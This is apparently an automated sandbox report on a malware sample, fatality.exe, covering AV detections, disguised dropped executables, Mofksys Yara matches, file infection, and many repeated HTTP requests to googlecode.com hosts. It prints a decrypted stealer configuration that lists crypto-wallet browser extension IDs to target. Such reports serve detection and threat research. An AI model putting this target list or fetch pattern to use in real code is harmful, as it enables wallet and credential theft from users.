                                      Source: C:\blockcomSession\Idle.exeReversingLabs: Detection: 82%
                                      Source: C:\blockcomSession\containerReview.exeReversingLabs: Detection: 82%
                                      Source: C:\blockcomSession\smss.exeReversingLabs: Detection: 82%
                                      Multi AV Scanner detection for submitted file
                                      Source: fatality.exeReversingLabs: Detection: 97%
                                      Machine Learning detection for dropped file
                                      Source: C:\Windows\System32\SecurityHealthSystray.exeJoe Sandbox ML: detected
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeJoe Sandbox ML: detected
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeJoe Sandbox ML: detected
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeJoe Sandbox ML: detected
                                      Source: C:\Windows\Resources\svchost.exeJoe Sandbox ML: detected
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeJoe Sandbox ML: detected
                                      Source: C:\Users\user\Desktop\hEPrrPJe.logJoe Sandbox ML: detected
                                      Source: C:\blockcomSession\Idle.exeJoe Sandbox ML: detected
                                      Source: C:\Users\user\Desktop\fatality.exe Joe Sandbox ML: detected
                                      Source: C:\Users\user\Desktop\SdSCeHzI.logJoe Sandbox ML: detected
                                      Source: C:\Windows\Resources\Themes\explorer.exeJoe Sandbox ML: detected
                                      Source: C:\Users\user\Desktop\FJTVnRjh.logJoe Sandbox ML: detected
                                      Source: C:\Windows\Resources\spoolsv.exeJoe Sandbox ML: detected
                                      Machine Learning detection for sample
                                      Source: fatality.exeJoe Sandbox ML: detected
                                      Sample uses string decryption to hide its real strings
                                      Source: 0000000D.00000002.1915424378.000000001346B000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"}}
                                      Source: 0000000D.00000002.1915424378.000000001346B000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-KNZ6qT1z1KAE3Pr0GoKV","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]

                                      Compliance

                                      barindex
                                      Detected unpacking (creates a PE file in dynamic memory)
                                      Source: C:\blockcomSession\containerReview.exeUnpacked PE file: 13.2.containerReview.exe.3250000.5.unpack
                                      Source: fatality.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      Source: C:\blockcomSession\containerReview.exeDirectory created: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe
                                      Source: C:\blockcomSession\containerReview.exeDirectory created: C:\Program Files\Mozilla Firefox\fonts\c0a39dc94da3cf
                                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: fatality.exe , fatality.exe , 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp
                                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.pdb source: containerReview.exe, 0000000D.00000002.1906268968.0000000003BB0000.00000004.00000800.00020000.00000000.sdmp

                                      Spreading

                                      barindex
                                      Yara detected Mofksys
                                      Source: Yara matchFile source: fatality.exe, type: SAMPLE
                                      Source: Yara matchFile source: 2.0.icsys.icn.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 0.2.fatality.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 14.2.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 14.0.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 4.2.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 7.2.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 8.2.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 2.2.icsys.icn.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 7.0.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 8.0.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 3.2.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 0.0.fatality.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 5.0.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 4.0.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 3.0.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000004.00000002.1726064451.0000000000402000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000007.00000000.1722308050.0000000000401000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000002.00000002.1733234738.0000000000402000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000004.00000000.1712734504.0000000000401000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000008.00000000.1815639732.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000002.00000000.1692168496.0000000000401000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000005.00000000.1714385550.0000000000401000.00000080.00000001.01000000.0000000E.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000000.00000000.1681547764.0000000000401000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 0000000E.00000000.1826039246.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000003.00000000.1705891813.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 0000000E.00000002.1829239210.0000000000402000.00000080.00000001.01000000.0000000B.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000007.00000002.1726017158.0000000000402000.00000080.00000001.01000000.0000000C.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000003.00000002.2940200306.0000000000402000.00000080.00000001.01000000.0000000B.sdmp, type: MEMORY
                                      Source: Yara matchFile source: Process Memory Space: fatality.exe PID: 7440, type: MEMORYSTR
                                      Source: Yara matchFile source: Process Memory Space: icsys.icn.exe PID: 7488, type: MEMORYSTR
                                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7540, type: MEMORYSTR
                                      Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 7560, type: MEMORYSTR
                                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7592, type: MEMORYSTR
                                      Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 7644, type: MEMORYSTR
                                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7752, type: MEMORYSTR
                                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7892, type: MEMORYSTR
                                      Source: Yara matchFile source: C:\Windows\Resources\Themes\icsys.icn.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Windows\Resources\svchost.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Windows\Resources\spoolsv.exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Windows\Resources\Themes\explorer.exe, type: DROPPED
                                      Infects executable files (exe, dll, sys, html)
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008EA69B FindFirstFileW,FindFirstFileW,1_2_008EA69B
                                      Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user
                                      Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\Documents\desktop.ini
                                      Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\AppData
                                      Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\AppData\Local\Temp
                                      Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                      Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\AppData\Local

                                      Networking

                                      barindex
                                      System process connects to network (likely due to code injection or exploit)
                                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 74.125.133.82 80Jump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 64.233.167.82 80Jump to behavior
                                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 66.102.1.82 80Jump to behavior
                                      Source: global trafficTCP traffic: 192.168.2.4:56638 -> 1.1.1.1:53
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
